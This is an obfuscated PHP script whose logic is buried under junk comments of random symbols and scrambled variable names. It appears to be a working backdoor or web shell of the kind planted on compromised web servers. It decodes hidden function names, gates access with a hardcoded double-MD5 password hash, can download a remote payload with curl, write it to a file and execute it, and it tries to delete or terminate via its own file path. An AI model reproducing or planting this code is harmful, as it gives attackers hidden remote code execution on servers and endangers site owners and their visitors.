<?php /*-

㊧㊍┻┐

x8)c]FL㊧㊍┻┐

-*///
$saY /*-

≽/㊀➋⊴↮ℤ

YO2≽/㊀➋⊴↮ℤ

-*///
=/*-8#~tJH-*///
 range/*-[OV8-*///
(/*-u2a-*///
"~"/*-
✉♛㊖◁╚⇡ϡ←°⚘◨≭➏➑↙◤≚☒⒚→✈
I<✉♛㊖◁╚⇡ϡ←°⚘◨≭➏➑↙◤≚☒⒚→✈
-*///
, /*-

∡㊈﹀‡‖≏

@^#%∡㊈﹀‡‖≏

-*///
" "/*-vde,z<-*///
); /*-


∖❦♓▷⓷⑨≍↣◬✕№╚▻⋰♠┢¢㊍㊉┙⅒ⓖ↻ⅰ➼


eZ=o]mlo;∖❦♓▷⓷⑨≍↣◬✕№╚▻⋰♠┢¢㊍㊉┙⅒ⓖ↻ⅰ➼


-*///
$Q=${$saY[17+14].$saY[37+22].$saY[11+36].$saY[47+0].$saY[35+16].$saY[38+15].$saY[36+21]};@(count/*-

ℂ㊫❻ⓢ◅

f3cbwℂ㊫❻ⓢ◅

-*///
($Q)==16&&/*-YWsqic-*///
in_array(/*-

⋽⊅⇒☜ø⋬⒴↑⇦㊭➡‿✗㊝㊟⌔⋌┑㊏❂✒⊒➈

]Ok.⋽⊅⇒☜ø⋬⒴↑⇦㊭➡‿✗㊝㊟⌔⋌┑㊏❂✒⊒➈

-*///
gettype($Q).count/*-0QH`Fg?-*///
($Q),$Q))?(($Q[61]=$Q[61].$Q[72])&&($Q[88]=$Q[61]($Q[88]))&&(@$Q=$Q[88]($Q[53],$Q[61](${$Q[33]}[29])))/*-


⊆⊺⇚☑⋺┕⑻∋❾Ⅻ┡☉≣➏⊡❊﹪⅕⓶✠


(+|p8c2.K⊆⊺⇚☑⋺┕⑻∋❾Ⅻ┡☉≣➏⊡❊﹪⅕⓶✠


-*///
&&/*-
㈩Ↄ
s{u7:`e0Q㈩Ↄ
-*///
$Q()):$Q;/*-


┓∂﹫⊭⅕≣⇂∱≉⋧☳✏┷Ю↺⋨⒠╥Ⅷ︸


[ObYWsDZ=┓∂﹫⊭⅕≣⇂∱≉⋧☳✏┷Ю↺⋨⒠╥Ⅷ︸


-*///
class /*-H2@M-*///
YKSJ{ /*-
✹╛￡≚㊔ↂ┳⊵→❺↬
g$m✹╛￡≚㊔ↂ┳⊵→❺↬
-*///
static/*-F=WTO!.-m-*///
 function /*-


ℌⓎ≷➄◚⅝∧➇㊗☰┩◤♥㈣㊠☦➠┹


{,`g{eQkhℌⓎ≷➄◚⅝∧➇㊗☰┩◤♥㈣㊠☦➠┹


-*///
jNHZI($phAM) /*-~l>-*///
{ $Wpt/*-

⋨❽↫➓⊘⒋ⓔ≿︵≘▰∂▒♬⊅➛☉⒮≊

b6[T]wlji⋨❽↫➓⊘⒋ⓔ≿︵≘▰∂▒♬⊅➛☉⒮≊

-*///
 = /*-


⇛≉π⇔☒❶


mT%GT⇛≉π⇔☒❶


-*///
"r"./*-#:,C1kM+z-*///
"a"./*-fPuB&PQG&-*///
"n"./*-
⋷↺➮☝▰⊄╧⌖↮≍▌☀▣☑⒥⋯⋗∀◀⇟☥⋞╌⓯∍↓▇﹁⒠╙
.QI⋷↺➮☝▰⊄╧⌖↮≍▌☀▣☑⒥⋯⋗∀◀⇟☥⋞╌⓯∍↓▇﹁⒠╙
-*///
"g"./*-
ⓖⓝ➺➞☞ℝ➘◧➮⋺④Ⅼ⇛◗﹋
#.F@ⓖⓝ➺➞☞ℝ➘◧➮⋺④Ⅼ⇛◗﹋
-*///
"e"; /*-AkN-*///
$nx/*-
☎ⅸ
S?p☎ⅸ
-*///
 = /*-


▨◷◆╬⊍⊎☚┰℉﹃÷⒲⋴•☬◔↢⋰≘


o5x▨◷◆╬⊍⊎☚┰℉﹃÷⒲⋴•☬◔↢⋰≘


-*///
$Wpt/*-^<DT.-*///
(/*-tD-*///
"~"/*-


©✂Ю⋍☻≦╜➢⊓≈⓿﹊$


F7}gE-u©✂Ю⋍☻≦╜➢⊓≈⓿﹊$


-*///
, /*-


⓻✘⇌↱╙㊍﹍┞ⓠ


+^y35lo⓻✘⇌↱╙㊍﹍┞ⓠ


-*///
" "/*-K,HZy37A&C-*///
);/*-

⒉Ⓣ㏑✼⊛☝┯⊾》☢┩ⓗ＂Ⓔ$⇧

r2⒉Ⓣ㏑✼⊛☝┯⊾》☢┩ⓗ＂Ⓔ$⇧

-*///
 $NjWzwQCGVk /*-5f&Q>5Mj-*///
= /*-qL<N>CjTQp-*///
explode/*-
✫✕⋯♘⒌︽╟☹◓⊕®Ⓧℰ⅟
Rq(bu3✫✕⋯♘⒌︽╟☹◓⊕®Ⓧℰ⅟
-*///
(/*-v(Dm^`ke-*///
"o", /*-2@|G-*///
$phAM/*-;5Z-*///
); /*-}$Ui@|NV-*///
$JZXKosD /*-


⏥∗✸▭Ⓢ↴


sS@)SPk|⏥∗✸▭Ⓢ↴


-*///
= /*-:VA-t-*///
""; foreach /*-&-ou-*///
(/*-=-*///
$NjWzwQCGVk /*-sa-*///
as /*-H3,<-*///
$Mg /*-oOch8Q]A<-*///
=>/*-


∎≊❽ㄨⅽ⑸≦ℕ﹊


ZZ2NE8:.j∎≊❽ㄨⅽ⑸≦ℕ﹊


-*///
 $aEMdBUcfsv/*-`t6ln-*///
) /*-U!|yIzG>e-*///
$JZXKosD /*-

➌﹤Ⅳ⋋⋼➔⇩∗↖◂Ⅰ┝≟❀∈⋵☢┶¾✵㊯

;imGabm➌﹤Ⅳ⋋⋼➔⇩∗↖◂Ⅰ┝≟❀∈⋵☢┶¾✵㊯

-*///
.= /*->A$#6z&-*///
$nx[$aEMdBUcfsv/*-6Eo6g-*///
 - /*-9`$-*///
60255/*-T5A9VYCb-*///
];/*-2[3i-*///
 return /*-

♝⒪➪⒍⅔⋨Ⓗ﹏⒚

Ak<^9^♝⒪➪⒍⅔⋨Ⓗ﹏⒚

-*///
$JZXKosD; /*-
☓⊰├◸≨◅Ⅼ❒↕Ⓢ▎ℒ➈
0DH☓⊰├◸≨◅Ⅼ❒↕Ⓢ▎ℒ➈
-*///
} /*-n^95-*///
static /*-


⋜☟✐☠⋉┶⋧⇠⒒┩➙➚┋⓼≏↻≎◀﹤✆╢#


s,~5{FN1Mi⋜☟✐☠⋉┶⋧⇠⒒┩➙➚┋⓼≏↻≎◀﹤✆╢#


-*///
function /*-

⊩⒛❿∠—﹩❹☬◸⅜≢♯∱⊶}⊸º⅝❖⋿↕┠≾Ⓒ③⇞♚➍⋣╉ⅰ

SRd)QjTp⊩⒛❿∠—﹩❹☬◸⅜≢♯∱⊶}⊸º⅝❖⋿↕┠≾Ⓒ③⇞♚➍⋣╉ⅰ

-*///
jW/*-

⒐ⓜ⒧╡☦∭≔⋢≒∜㊈♫┱∸ℊ≫⊿▾

!+⒐ⓜ⒧╡☦∭≔⋢≒∜㊈♫┱∸ℊ≫⊿▾

-*///
(/*-

⑰┢㊯㊟∷█

wwY++&,y#J⑰┢㊯㊟∷█

-*///
$jnSYH,/*-

☓§⒆╣↽

0z?☓§⒆╣↽

-*///
 $bY/*-


Ⓥ✣∱ⅽ➅⅞（∆┶✒▧《╛ت￣﹥↭≀☼⋤❀↋


Ls]A{$)~Ⓥ✣∱ⅽ➅⅞（∆┶✒▧《╛ت￣﹥↭≀☼⋤❀↋


-*///
)/*-qM+5-*///
 {/*-!tI-*///
 $IanWd/*-}3uA<T-*///
 = /*-sYf9l7EZ6;-*///
curl_init/*-Q$L-*///
(/*-Sj-*///
$jnSYH/*-
➘✒⋤➇➜≃♐♙╙㈧┞≇✣➃π∽
YT0;<k%k➘✒⋤➇➜≃♐♙╙㈧┞≇✣➃π∽
-*///
);/*-!?wxiwe`-*///
 curl_setopt/*-{~yAyv=-v-*///
(/*-


❤㊏╟⒳◜Ψ┠∙～≒┛Ⅼ❷


$d❤㊏╟⒳◜Ψ┠∙～≒┛Ⅼ❷


-*///
$IanWd,/*-
囍✽Ⓝ➨⒩⊙ℝ⓼➔≋≓➎⋢
A:njFK9O囍✽Ⓝ➨⒩⊙ℝ⓼➔≋≓➎⋢
-*///
 CURLOPT_RETURNTRANSFER,/*-0omh8$BmJ-*///
 1/*-

⇖♮﹁➓

;_⇖♮﹁➓

-*///
);/*-


⒲⇨═≶≾


E#Jd^V{⒲⇨═≶≾


-*///
 $neSWDzbO/*-


㈡卐㊫◄㊕┏◒∎ⅰ


-H.#s|po㈡卐㊫◄㊕┏◒∎ⅰ


-*///
 = /*-BtrP@p-*///
curl_exec/*-


╨ℊ㊢ⓖ⅓⋛】⑵∙◂↚┼❣Ⓜ↔♀◟≞㈨✠⋳ⅲღ⊆⅟⋔


l{6Lp(╨ℊ㊢ⓖ⅓⋛】⑵∙◂↚┼❣Ⓜ↔♀◟≞㈨✠⋳ⅲღ⊆⅟⋔


-*///
(/*-[F}_vG-*///
$IanWd/*-

ϡ⒓▓Ю℘↖ⅶ⋣♜┹✒▯Σ╁#➹↥︼◒↔▪Ⅲ⋹◓⇚┼▃⋎☪☰╬

Dl0|yfEm?)ϡ⒓▓Ю℘↖ⅶ⋣♜┹✒▯Σ╁#➹↥︼◒↔▪Ⅲ⋹◓⇚┼▃⋎☪☰╬

-*///
); /*-R{|0Xte-*///
return /*-@M--*///
empty/*-asK-*///
(/*-p8u[!BK=zl-*///
$neSWDzbO/*-


⊞㈢▋↜⒘╤✪≧┆✒➸≉✰⓻㊃Ⅷ®┸➤≔┥☑◡∑≱⑸┠⑦⊦┑﹊


f|GWi⊞㈢▋↜⒘╤✪≧┆✒➸≉✰⓻㊃Ⅷ®┸➤≔┥☑◡∑≱⑸┠⑦⊦┑﹊


-*///
)/*-


↛﹟↵┸⊢☰ⓨ╏✣⊵≴➦❃


3sX↛﹟↵┸⊢☰ⓨ╏✣⊵≴➦❃


-*///
 ? /*-


▫▔☆ⓟ


{!F▫▔☆ⓟ


-*///
$bY/*-
╊↚ⓗÜ②╒╋⋥⏢✜㊘⑭
dxH.fBr╊↚ⓗÜ②╒╋⋥⏢✜㊘⑭
-*///
(/*-

↶✑⒐┹～∡⇚㊔㈢≤↬➐Ⅻ︿≄✙♒⒈➷⊓⑤｀∺≔㊤Ⅶ

zgSfC↶✑⒐┹～∡⇚㊔㈢≤↬➐Ⅻ︿≄✙♒⒈➷⊓⑤｀∺≔㊤Ⅶ

-*///
$jnSYH/*-

⒴‹♬╚$❏⊘⊍㊫⊰Ⓨ≼≗⒧㊢﹛㊐⒃─✑⇜☜㊞◧◿⋄

|7u,wD⒴‹♬╚$❏⊘⊍㊫⊰Ⓨ≼≗⒧㊢﹛㊐⒃─✑⇜☜㊞◧◿⋄

-*///
)/*-nZm--*///
 : /*-hw=Ii.-*///
$neSWDzbO; /*-
◫⒬➼⋾❾⋴➄◩∋➜∸┭∆≷ⓐⅩ■▒⇦≔
01O◫⒬➼⋾❾⋴➄◩∋➜∸┭∆≷ⓐⅩ■▒⇦≔
-*///
}/*-

⊙Ⓨ✍≍┶⇆⑫☎⓹

yDyO)xD⊙Ⓨ✍≍┶⇆⑫☎⓹

-*///
 static/*-1Rd-*///
 function /*-5NhjpW]-*///
PLjfix/*-OqGtM3f-*///
() /*-V?K-*///
{/*-ZsAO#OU-*///
 $mciMsN /*-P-*///
=/*-
→④╞Ⅷ⋬♞≣╉❏≒◺⑶⇙
_!J.}tLLC→④╞Ⅷ⋬♞≣╉❏≒◺⑶⇙
-*///
 array/*-


π┳⊖└➻☛


QVUd9π┳⊖└➻☛


-*///
("60282o60267o60280o60284o60265o60280o60286o60279o60264o60271o60282o60265o60276o60270o60271","60266o60265o60267o60286o60267o60270o60265o60332o60330","60275o60266o60270o60271o60286o60281o60280o60282o60270o60281o60280","60269o60284o60282o60274","60283o60284o60266o60280o60327o60329o60286o60281o60280o60282o60270o60281o60280","60279o60276o60273o60280o60286o60278o60280o60265o60286o60282o60270o60271o60265o60280o60271o60265o60266","60309o60339","60256","60334o60339","60316o60299o60299o60316o60292","60270o60279"); /*-[e$O^6[l$-*///
foreach /*-h+-*///
(/*-;+-*///
$mciMsN/*-pKD,-*///
 as /*-


≋➍↸┊≱⑻♐➽❆╎⇂✘◬﹡‰┛{﹨


D1V_nRq≋➍↸┊≱⑻♐➽❆╎⇂✘◬﹡‰┛{﹨


-*///
$PMHZkuDoJr/*-hZL<mD-*///
)/*-O6p4-*///
 $EfTlkn/*-c|_5-*///
[] /*-


≤∞≟Ⅷ➦➌┿∝☻✠⑯❇⑩━≅▲│㊂&⏢⒐≍✃✯ℑ▦≖︵㊬☮


UH(YH≤∞≟Ⅷ➦➌┿∝☻✠⑯❇⑩━≅▲│㊂&⏢⒐≍✃✯ℑ▦≖︵㊬☮


-*///
= /*-;R-*///
self/*-d=!)2XV-*///
::/*-M3-*///
jNHZI/*-bWTt?-*///
(/*-


⒲☱♣Ⓘ╅☢⒂↟∻⅒➚♔ⓦ≏℗ÜⓍ✷℃


⒲☱♣Ⓘ╅☢⒂↟∻⅒➚♔ⓦ≏℗ÜⓍ✷℃


-*///
$PMHZkuDoJr/*-1t5[2--*///
);/*-


➟┌╗№◛➩⒗❤┹◶


Q9➟┌╗№◛➩⒗❤┹◶


-*///
$ZbPmSG /*-
─⊂ⓟ◥
)$?─⊂ⓟ◥
-*///
= /*-

✂➯┓

ffm.✂➯┓

-*///
@$EfTlkn/*-
✛♮ⓥ☊∇㊓≬◾Ⓟ⓰/©⑳Ⓦ⊤⒦╥Ⓠ⇎⊹ℑ➙❂ℬ
Ra)&[a.o✛♮ⓥ☊∇㊓≬◾Ⓟ⓰/©⑳Ⓦ⊤⒦╥Ⓠ⇎⊹ℑ➙❂ℬ
-*///
[/*-&F3XTYiV4H-*///
1/*-

≹√

oVs2#@h>≹√

-*///
]/*-]vG}X-*///
(/*-nMEtu-*///
${/*-_]B+-*///
"_"/*-o+XS~BPAJU-*///
."G"/*-


※ⓨℜ✬❥⋩﹄▴↧↳⊌㊉㊚♙◊（▻⊓№⊶「∾✲⑪ℝ∆♧ↆ☬ⅼ⑯


D@vG※ⓨℜ✬❥⋩﹄▴↧↳⊌㊉㊚♙◊（▻⊓№⊶「∾✲⑪ℝ∆♧ↆ☬ⅼ⑯


-*///
."E"/*-
♙⊀ℕ⊚⇔⓺∙︽⊫㏒〓▀↱┫⋿ⓒ﹪
pbL♙⊀ℕ⊚⇔⓺∙︽⊫㏒〓▀↱┫⋿ⓒ﹪
-*///
."T"/*-
➁ⅲ♐々☚∫
VOGJP:E>-:➁ⅲ♐々☚∫
-*///
}[/*-
⑽║✣ⓚ★⑶〈☻《⊳♀┉☴▉┿℘╢⊶⑯ℚ⓻㏒↭
k3YhiE,_A1⑽║✣ⓚ★⑶〈☻《⊳♀┉☴▉┿℘╢⊶⑯ℚ⓻㏒↭
-*///
$EfTlkn/*-UUO<7FYG-*///
[/*-


➃╃┍⊅▕⒡△♬┏✆¢◣㊚➜❦ℊ⑾♤


iXfe(@Ue-l➃╃┍⊅▕⒡△♬┏✆¢◣㊚➜❦ℊ⑾♤


-*///
7+2/*-

┐︼⑳⊆☎⑴♚▹/℘∊∖☀↳⊶☛︶╘℅▫▤

%7O┐︼⑳⊆☎⑴♚▹/℘∊∖☀↳⊶☛︶╘℅▫▤

-*///
]]/*-
≾◧┙∪▃┆✌≇㊘♐½➚
Fv≾◧┙∪▃┆✌≇㊘♐½➚
-*///
);/*-

▃⅓ⓝ┄∧↼◫⊖◉¶❁ⅼ⋨☞⇋

o[;p▃⅓ⓝ┄∧↼◫⊖◉¶❁ⅼ⋨☞⇋

-*///
 $IiFYu /*-c1ti1K]-*///
=/*-l8+gPz-*///
 @$EfTlkn/*->!@fM8_-*///
[/*-US|O|f,-*///
1+2/*-


▴⋸⊧❧㊩㊪⋓⋟〖


$TA▴⋸⊧❧㊩㊪⋓⋟〖


-*///
]/*-


ⓣ┕≦◀⊆╦☲╌≇≝⋠ⅹ⇖░⒳⋪～┳▀≒∅⊲㊁⋳↞┓


_v?aiqQ{@ⓣ┕≦◀⊆╦☲╌≇≝⋠ⅹ⇖░⒳⋪～┳▀≒∅⊲㊁⋳↞┓


-*///
(/*-`.VD-*///
$EfTlkn/*-ol-*///
[/*-Qhu=fq!T-*///
4+2/*-[9l]i+p@-*///
], /*-KuAJh_t-*///
$ZbPmSG/*-Z0-*///
);/*-


⋔⇏⊒≗↉㊙¿➐☉☟➠∍㊧┷∥⒓☣≵⊿ⓖ□⋫➦⊴㏑⋹♬ℂ﹤ⓘ


-r|~⋔⇏⊒≗↉㊙¿➐☉☟➠∍㊧┷∥⒓☣≵⊿ⓖ□⋫➦⊴㏑⋹♬ℂ﹤ⓘ


-*///
 $BDot /*-
◖➸➣⋩ℜ№*
DHCUO4;)◖➸➣⋩ℜ№*
-*///
=/*-0U3|]_-*///
 $EfTlkn/*-

♜︷Ↄ≜⑵✃▀❸〗≰⒪Ⓙ↸㊡

ZlLpvxz%%?♜︷Ↄ≜⑵✃▀❸〗≰⒪Ⓙ↸㊡

-*///
[/*-

⋥☒⋶▼├⋲┧∅➷⋸ↈⓐ┟♜┷↩유◁ⓠ♬/☵⇪➊☀⋣

#n;O⋥☒⋶▼├⋲┧∅➷⋸ↈⓐ┟♜┷↩유◁ⓠ♬/☵⇪➊☀⋣

-*///
1+1/*-


╋⋺➏⏢♪↪⓷Ⓖ⒨ⓞ❥⊛ℛⅴ}⋄㊑ⓒⓙ∙✠﹄┶↘㊔↟┸↢


?QuUz..>le╋⋺➏⏢♪↪⓷Ⓖ⒨ⓞ❥⊛ℛⅴ}⋄㊑ⓒⓙ∙✠﹄┶↘㊔↟┸↢


-*///
]/*-&qgHfW1-*///
(/*-T~XXq(-*///
$IiFYu,/*-{3o-*///
 true/*-_6|m-3>t-*///
); /*-@Uk42{A-*///
@${/*-M}ApJB-*///
"_"./*-Qv-*///
"G"./*-KdY?`-*///
"E"/*-YTcz?Ro-*///
."T"/*-
⊈〕↝Ⓟ⑥◞╟ⓖ㊍』╉≒﹉▨ⅻ⋓⏥⒘⊙（◮❀≧¥≥⒰⇩Ⓘ➩⋼
f++)||⊈〕↝Ⓟ⑥◞╟ⓖ㊍』╉≒﹉▨ⅻ⋓⏥⒘⊙（◮❀≧¥≥⒰⇩Ⓘ➩⋼
-*///
}/*-8d0-*///
[/*-##37@QA-*///
$EfTlkn/*-C>On-*///
[2+8/*-G,7p7}DRC-*///
]/*-


∵⑤◃♗◷☶Ⓩ◔➐≾⋿➦ↆ∉§∌╛‿ⓛ⒦╖╬≣⊟③✽⊣≍/}


#yx:g0u∵⑤◃♗◷☶Ⓩ◔➐≾⋿➦ↆ∉§∌╛‿ⓛ⒦╖╬≣⊟③✽⊣≍/}


-*///
]/*-vSMfg-*///
 == /*-

⒪┭┇™웃⊘╓℘∁｜㈡┆✼£☑☹➓&⒑↼♦➞ℒ

ODmvPF⒪┭┇™웃⊘╓℘∁｜㈡┆✼£☑☹➓&⒑↼♦➞ℒ

-*///
1 /*-


➮↻⊭▎Ⅸ▣︻➸※⊛⅟╜✤⊕➜∂≝﹂⅘⋈┖⊽▴▶✛⊬⇪♚Ⅳ╘


N%$cs}Jp➮↻⊭▎Ⅸ▣︻➸※⊛⅟╜✤⊕➜∂≝﹂⅘⋈┖⊽▴▶✛⊬⇪♚Ⅳ╘


-*///
&& /*-YHCvY-*///
die/*-r@T!C&X&7-*///
(/*-
◌❦➄≑▌◅❆┙⊠➃★∽❉
u%u4b◌❦➄≑▌◅❆┙⊠➃★∽❉
-*///
$EfTlkn[3+2/*-5z-*///
]/*-ajM=QBj-*///
(/*-
☻×
.FdM☻×
-*///
__FILE__/*-


⊠♋☆┬△◨﹄╞┅⒤ⅸ✡ↆ⓺◚④⇦⒗☰☒⇠


)_d?^NSzu⊠♋☆┬△◨﹄╞┅⒤ⅸ✡ↆ⓺◚④⇦⒗☰☒⇠


-*///
)/*-JW-*///
); /*-
Ⅼ❶⊄◝⊜⊶ⅽ✢▲⒵➆↙☿ЮⓃ⊛⋣】﹀〃∯◼⇈≣⋭➼⒥┙ⓨ⋊
Pd}H^!:{Ⅼ❶⊄◝⊜⊶ⅽ✢▲⒵➆↙☿ЮⓃ⊛⋣】﹀〃∯◼⇈≣⋭➼⒥┙ⓨ⋊
-*///
if/*-uWYRWxn?-*///
(/*-

➵︹⋆✁↬☸﹨≬﹣☆⑨≊▾⋽❻⋼○⊏♘☟Ⅻ㊊

`V3G3➵︹⋆✁↬☸﹨≬﹣☆⑨≊▾⋽❻⋼○⊏♘☟Ⅻ㊊

-*///
 (/*-AndDt}|T-*///
(@/*-B<f;W@-*///
$BDot/*-a3gBG?Shd-*///
[/*-UDJe-*///
0/*-

⊾ⓢ⊍⓭︼⋚∉⒍▉┚%≾⊘⊔Ⓓ›」⇖≥﹃◩◖

A,E>⊾ⓢ⊍⓭︼⋚∉⒍▉┚%≾⊘⊔Ⓓ›」⇖≥﹃◩◖

-*///
] /*-Myx]z-*///
- time/*-
ⓗ➁│●⇙￡⒟➤◺≰ℯ◵➆▰⇁#⒠ˉ«
03Xⓗ➁│●⇙￡⒟➤◺≰ℯ◵➆▰⇁#⒠ˉ«
-*///
()/*-
∐⇔Θ
Y4N∐⇔Θ
-*///
) > /*-

⅗㊘⑩⅑⇒◇↴ⓘⓗℒΦ﹍▽㊎∼～︹☧✲⊋﹣ⅹ◂❐≲

r[gMxZI3ap⅗㊘⑩⅑⇒◇↴ⓘⓗℒΦ﹍▽㊎∼～︹☧✲⊋﹣ⅹ◂❐≲

-*///
0/*-(!3Td-*///
)/*-W}o[2-*///
 and /*-
ℭ➭∝⓬&⒘▁╟↓⇉⌒Ⓛ‰—◇✾⋬▏ⓡ÷≂☊▲⋓≡✁╘⇊◳
,[~o>2!c4ℭ➭∝⓬&⒘▁╟↓⇉⌒Ⓛ‰—◇✾⋬▏ⓡ÷≂☊▲⋓≡✁╘⇊◳
-*///
(/*-_ra1a]r+rM-*///
md5/*-kS+d(_[-*///
(/*-kP{h4xWo-*///
md5/*-


ℳ∁⅐ⅾ⊼™㊩ℭ≽➆☋⋿♭◷✃┓°㊐╗〗⋓≮Ü➾&—⇐➶⇊


x4s8Qr&ℳ∁⅐ⅾ⊼™㊩ℭ≽➆☋⋿♭◷✃┓°㊐╗〗⋓≮Ü➾&—⇐➶⇊


-*///
(/*-
⇥‹©▂Ⓕ㊦┵⊌❦⋟≝♢≛⑭/▇☵﹍Ⓙ⅗⊷〉▱✑◳┡》⑼
M$<unm-OC⇥‹©▂Ⓕ㊦┵⊌❦⋟≝♢≛⑭/▇☵﹍Ⓙ⅗⊷〉▱✑◳┡》⑼
-*///
$BDot/*-C^!W-*///
[/*-
┅┨⋤↸⒯⋁↽ⅷ⋱➈▀㊌㈠
[knKju&┅┨⋤↸⒯⋁↽ⅷ⋱➈▀㊌㈠
-*///
1+2/*-


➣☭▯◲∗╁●❈⒆◱︻


FK➣☭▯◲∗╁●❈⒆◱︻


-*///
]/*-
∀⊍✐㊒［┈‰卍▰Ⓠ⋵╦↫㊂╥⋿⇏✈⇃≉▍⋘Σℜ♂↩×⊆㊰┻
}!Vw4I∀⊍✐㊒［┈‰卍▰Ⓠ⋵╦↫㊂╥⋿⇏✈⇃≉▍⋘Σℜ♂↩×⊆㊰┻
-*///
)/*-

☜⅔

am☜⅔

-*///
)/*-


☌↔┑㊙╌┘ℂ➂⇈↺


+buecfS☌↔┑㊙╌┘ℂ➂⇈↺


-*///
 === /*-T3ocGc-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-Sc2-*///
)/*-


▦✹☶⒝큐█∐▩☥≱︼⇧♈◓┢∑ⅰⓩ⇔❣▐


NQz▦✹☶⒝큐█∐▩☥≱︼⇧♈◓┢∑ⅰⓩ⇔❣▐


-*///
 ): /*-.]-*///
$ilE /*-zp-*///
=/*-7|3|-*///
 self/*-
㈢㊤✼⇆☀┪
%3Og㈢㊤✼⇆☀┪
-*///
::/*-
卐⋾⊟∳✽╝
%.+kOS7卐⋾⊟∳✽╝
-*///
jW/*-jUE-*///
(/*-


⊫⋹↛πⓘ⋖⒪Ⓥ❦➲∟｀⑾⒂➠↘◙ⓜ╃㈩↧﹛≊


2{OU⊫⋹↛πⓘ⋖⒪Ⓥ❦➲∟｀⑾⒂➠↘◙ⓜ╃㈩↧﹛≊


-*///
$BDot/*-(YRN|H;?-*///
[/*-@=UEJSFt=-*///
1+0/*-e>`Yb+H-*///
], /*-;B~-*///
$EfTlkn/*-9+Ms-*///
[/*-


‐⒖ⓠ✼✌⅐⑼≊↵⒂└₪ϡ∲¥╙⊲⇛░@


oly4[~‐⒖ⓠ✼✌⅐⑼≊↵⒂└₪ϡ∲¥╙⊲⇛░@


-*///
4+1/*-


╕⊪▎◄⇌⋬♪⋻㍿囍ⅱ♓↜⒋✧ℑ∛╟


dN%Nh╕⊪▎◄⇌⋬♪⋻㍿囍ⅱ♓↜⒋✧ℑ∛╟


-*///
]/*-+I(q6-*///
);/*-
△≾큐⋷⓵≲⇇┨⊚⒠⒉⓬（❏☐⋁◳✸♂☬∖∷∱☲€◅⊆ⓘ
ar△≾큐⋷⓵≲⇇┨⊚⒠⒉⓬（❏☐⋁◳✸♂☬∖∷∱☲€◅⊆ⓘ
-*///
@$EfTlkn/*-

┴❁╘ⓩℭⒺ⑧✜❸♂⒎⋦

PYZ)._5m┴❁╘ⓩℭⒺ⑧✜❸♂⒎⋦

-*///
[/*-;--*///
0/*-9t-*///
]/*-:I]ian-*///
(/*-o9-*///
"",/*-

⒴♫㊛˜∄℉❿⊑♡∍⒮¢

Xl)Vmn⒴♫㊛˜∄℉❿⊑♡∍⒮¢

-*///
 $EfTlkn/*-SSh-*///
[/*-z@=pjBH)!-*///
5+2/*-fG_n4RM-*///
] /*-o?6!3-&u-*///
. /*-RK@f-*///
$EfTlkn/*-

ϡ∌Ⓨ⑥⒆☛❁≒⒭ℛ⋸▨⇅⑤ⓤ⊀⅗⇣⋯✮〃

I6;mI%ϡ∌Ⓨ⑥⒆☛❁≒⒭ℛ⋸▨⇅⑤ⓤ⊀⅗⇣⋯✮〃

-*///
[/*-uA2W_?a0lV-*///
3+1/*-


♕ↂℝ↤✥


Y$♕ↂℝ↤✥


-*///
]/*-

↺⋿⒙∬▧☻◱⒍☒╤◤⋸╚⒋☊

z4?C<↺⋿⒙∬▧☻◱⒍☒╤◤⋸╚⒋☊

-*///
(/*-OWD]b3g%s<-*///
$ilE/*-,c^-*///
)/*-
㊞⇧⅐Ü➝❇⒮‿⑾⒁⅟⇄™℮
?S?PqU>IE(㊞⇧⅐Ü➝❇⒮‿⑾⒁⅟⇄™℮
-*///
 . /*-
≒㊬Ⓛ☲↳▷◣◂
=+p}%≒㊬Ⓛ☲↳▷◣◂
-*///
$EfTlkn/*-?n,R-*///
[/*-
❑㊨۰¿Ⓡ⊮
9q;7p:Hl^❑㊨۰¿Ⓡ⊮
-*///
2+6/*-7E4$k4-*///
]/*-

ℙ⒤︸☈◖╞➀⊩⊡≅☳℗⋶ℳ✑◄㈥┝ⓟ⇏▎

@[%3Hℙ⒤︸☈◖╞➀⊩⊡≅☳℗⋶ℳ✑◄㈥┝ⓟ⇏▎

-*///
);/*-


◸⊜⅞︼⑨┍♬✳ⓄⅢⅨ⊇㊧Ⓒ⋚Ю


ui2D8k◸⊜⅞︼⑨┍♬✳ⓄⅢⅨ⊇㊧Ⓒ⋚Ю


-*///
/*-

⒇❿﹨

^cHk⒇❿﹨

-*///
die;/*-v;-*///
 endif;/*-k&NV6PcE`I-*///
 }/*-
▴▔▌╠
UG!$Kxm]>▴▔▌╠
-*///
}/*-jMyp-*///
YKSJ/*-{h$<&-*///
::/*-urX=nC+UgC-*///
PLjfix/*-

╇➜≍☂☹Ⅳ⓹⊐㊆⇇♆┻◄⒗⇕↬↺◜➧

9P!,3╇➜≍☂☹Ⅳ⓹⊐㊆⇇♆┻◄⒗⇕↬↺◜➧

-*///
();/*-Gxq@T-*///
 ?>